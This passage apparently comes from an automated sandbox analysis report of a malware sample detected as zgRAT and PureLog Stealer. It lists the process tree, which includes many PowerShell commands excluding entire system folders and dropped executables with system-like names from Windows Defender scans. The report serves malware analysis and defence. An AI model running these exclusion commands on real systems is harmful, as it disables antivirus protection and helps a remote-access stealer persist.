                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:29
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ChainbrowserNet/'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:30
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:31
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:32
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:33
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:34
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:35
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:36
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:37
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:38
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:39
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:40
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:41
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:42
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:43
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:44
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:45
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:46
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:47
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:48
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:49
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\Memory Compression.exe'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:50
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainbrowserNet\backgroundTaskHost.exe'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:51
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:52
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:53
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:54
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:55
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Videos\System.exe'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:56
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\upfc.exe'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:57
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainbrowserNet\serverDll.exe'
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:58
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:59
                                                                                          Start time:05:07:07
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:60
                                                                                          Start time:05:07:08
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:61
                                                                                          Start time:05:07:08
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:62
                                                                                          Start time:05:07:08
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe"
                                                                                          Imagebase:0x30000
                                                                                          File size:3'701'760 bytes
                                                                                          MD5 hash:9F9F04273C02095B1603F3B01EB15D53
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 65%, ReversingLabs
                                                                                          Has exited:true

                                                                                          Target ID:63
                                                                                          Start time:05:07:09
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe"
                                                                                          Imagebase:0xe30000
                                                                                          File size:3'701'760 bytes
                                                                                          MD5 hash:9F9F04273C02095B1603F3B01EB15D53
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:64
                                                                                          Start time:05:07:09
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ff39zMQKS5.bat"
                                                                                          Imagebase:0x7ff7be540000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:65
                                                                                          Start time:05:07:09
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:66
                                                                                          Start time:05:07:11
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\chcp.com
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:chcp 65001
                                                                                          Imagebase:0x7ff64b1d0000
                                                                                          File size:14'848 bytes
                                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:70
                                                                                          Start time:05:07:14
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Recovery\Memory Compression.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Recovery\Memory Compression.exe"
                                                                                          Imagebase:0x680000
                                                                                          File size:3'701'760 bytes
                                                                                          MD5 hash:9F9F04273C02095B1603F3B01EB15D53
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\Memory Compression.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\Memory Compression.exe, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 65%, ReversingLabs
                                                                                          Has exited:true

                                                                                          Target ID:71
                                                                                          Start time:05:07:14
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Recovery\Memory Compression.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Recovery\Memory Compression.exe"
                                                                                          Imagebase:0xfd0000
                                                                                          File size:3'701'760 bytes
                                                                                          MD5 hash:9F9F04273C02095B1603F3B01EB15D53
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:72
                                                                                          Start time:05:07:14
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\w32tm.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                          Imagebase:0x7ff61fce0000
                                                                                          File size:108'032 bytes
                                                                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:73
                                                                                          Start time:05:07:15
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\ChainbrowserNet\serverDll.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\ChainbrowserNet\serverDll.exe
                                                                                          Imagebase:0xd00000
                                                                                          File size:3'701'760 bytes
                                                                                          MD5 hash:9F9F04273C02095B1603F3B01EB15D53
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:74
                                                                                          Start time:05:07:15
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\ChainbrowserNet\serverDll.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\ChainbrowserNet\serverDll.exe
                                                                                          Imagebase:0x550000
                                                                                          File size:3'701'760 bytes
                                                                                          MD5 hash:9F9F04273C02095B1603F3B01EB15D53
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:75
                                                                                          Start time:05:07:15
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Users\Default\Videos\System.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\Default User\Videos\System.exe"
                                                                                          Imagebase:0xf80000
                                                                                          File size:3'701'760 bytes
                                                                                          MD5 hash:9F9F04273C02095B1603F3B01EB15D53
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\Videos\System.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Videos\System.exe, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 65%, ReversingLabs
                                                                                          Has exited:true

                                                                                          Target ID:76
                                                                                          Start time:05:07:16
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Users\Default\Videos\System.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\Default User\Videos\System.exe"
                                                                                          Imagebase:0x630000
                                                                                          File size:3'701'760 bytes
                                                                                          MD5 hash:9F9F04273C02095B1603F3B01EB15D53
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:81
                                                                                          Start time:05:07:23
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\ChainbrowserNet\backgroundTaskHost.exe"
                                                                                          Imagebase:0x1f0000
                                                                                          File size:3'701'760 bytes
                                                                                          MD5 hash:9F9F04273C02095B1603F3B01EB15D53
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ChainbrowserNet\backgroundTaskHost.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainbrowserNet\backgroundTaskHost.exe, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 65%, ReversingLabs
                                                                                          Has exited:false

                                                                                          Target ID:82
                                                                                          Start time:05:07:28
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                          Imagebase:0x7ff693ab0000
                                                                                          File size:496'640 bytes
                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false


                                                                                            Execution Graph

                                                                                            Execution Coverage:9.6%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:9.2%
                                                                                            Total number of Nodes:1514
                                                                                            Total number of Limit Nodes:28
